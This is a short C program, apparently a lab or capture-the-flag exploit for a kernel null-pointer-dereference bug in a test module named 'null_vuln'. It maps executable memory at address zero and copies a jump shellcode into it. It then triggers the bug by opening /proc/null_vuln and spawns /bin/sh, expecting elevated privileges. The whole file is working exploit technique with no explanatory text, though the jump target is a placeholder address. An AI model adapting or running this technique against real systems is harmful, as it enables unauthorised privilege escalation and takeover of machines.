#include<stdio.h> 
#include<sys/mman.h> //mmap()
#include<fcntl.h> //open()
#include<string.h> //memcpy()
#include<stdlib.h> //system()


int main() {
	mmap(0x00,0x1000,PROT_READ | PROT_WRITE | PROT_EXEC , MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS ,-1 , 0);
	char payload[]="\xe9\xea\xbe\xad\x0b"; //e9eabead0b
	/* 
		jmp 0xbadbeef
	*/
	memcpy(0x00,payload,sizeof(payload)); // copy the shellcode to 0x00
	
	// trigger the bug in module by opening the proc file  
	int fd = open("/proc/null_vuln",O_RDONLY); 

	system("/bin/sh");
	
	return 0;
}
	
